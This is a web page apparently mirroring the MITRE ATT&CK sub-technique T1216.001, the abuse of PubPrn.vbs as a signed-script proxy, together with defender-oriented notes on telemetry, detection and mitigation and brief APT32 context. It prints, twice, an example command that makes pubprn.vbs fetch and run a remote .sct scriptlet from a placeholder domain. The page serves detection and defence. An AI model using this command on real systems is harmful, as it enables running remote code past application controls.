T1216.001: PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.[1]
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[2] To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).
Analyst context for executives and security teams
PubPrn matters because it is a trusted Windows script that can be abused as a stealthy proxy for running remote malicious content, especially where controls trust Microsoft-signed scripts too broadly. For leaders, the issue is less the printer-publishing function itself and more whether endpoint execution controls, script monitoring, and Windows version baselines can distinguish legitimate administrative use from abuse.
Executive priority
Prioritize this as a Windows execution-control and monitoring validation item. It can affect audit confidence in application control, SOC visibility for signed-script abuse, and incident response triage when trusted Windows utilities appear in suspicious execution chains. Because later Windows 10+ versions restrict the abused remote-proxy behavior, asset age and operating system consistency are important risk factors.
Technical view
Validate coverage for PubPrn.vbs execution on Windows, especially when launched through Cscript.exe or Windows Command Shell and when arguments deviate from expected printer publishing to LDAP paths. ATT&CK provides no official detection text, but relationship context identifies DET0528, Detecting Remote Script Proxy Execution via PubPrn.vbs. SOC teams should test whether command-line capture, script-host monitoring, endpoint behavior prevention, and application-control logs expose attempts to use PubPrn as part of System Script Proxy Execution under T1216.
Likely telemetry
- Windows process creation events including parent process, child process, and full command line for cscript.exe and PubPrn.vbs
- Script host execution telemetry for Visual Basic script activity
- Command shell execution history involving PubPrn.vbs
- Network telemetry from endpoints showing script-host or related process access to remote HTTP(S) resources
- Application control, script blocking, or execution-prevention events
Detection direction
- Confirm DET0528-style logic exists or can be implemented for remote script proxy execution via PubPrn.vbs.
- Tune for PubPrn.vbs usage with unexpected second-parameter patterns, especially non-LDAP remote content references, while allowing for legitimate printer publishing activity where it exists.
- Correlate process command line, parent process, network destination, and endpoint control events rather than relying only on file reputation or Microsoft signature trust.
- Account for Windows version differences: later Windows 10+ behavior limits the described remote proxy technique, so detection expectations may differ across legacy and current assets.
- Review false positives from administrators or print management processes that legitimately publish printers to Active Directory Domain Services.
Mitigation priorities
- Apply execution prevention controls such as application control and script blocking for unauthorized or unnecessary script execution, aligned to M1038.
- Use endpoint behavior prevention controls to identify and block suspicious process and script behavior, aligned to M1040.
- Reduce exposure from legacy Windows systems where the remote proxy behavior may remain possible; verify Windows 10+ baselines where applicable.
- Restrict trusted-script allow rules so Microsoft-signed scripts are not automatically permitted to proxy arbitrary execution without context.
- Document legitimate PubPrn administrative use so exceptions are narrow, reviewable, and defensible for compliance evidence.
Analyst notes and limits
This is a Windows sub-technique of System Script Proxy Execution and is associated with stealth in the supplied ATT&CK object. Relationship context also notes use by APT32, but that should be treated as historical ATT&CK context rather than evidence of current targeting in any local environment.
ATT&CK provides no official detection text for this object, so detection recommendations rely on the supplied behavior description and the DET0528 relationship. Local validation is required to determine whether PubPrn.vbs exists, whether legitimate printer-publishing workflows use it, which Windows versions are present, and whether command-line, script, network, and control telemetry are actually collected.
PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.[1]
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[2] To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Related techniques
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1216 | System Script Proxy Execution | This object subtechnique of System Script Proxy Execution. |
Groups, software, and campaigns
G0050: APT32
APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.[1][2][3]
All related ATT&CK context
Mitigation direction
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 3.0 | Current bundle | 97fb7d7675e6… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
pubprn
Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.
Open source URL -
[2]
Enigma0x3 PubPrn Bypass
Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.
Open source URL -
[3]
mitre-attack T1216.001Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.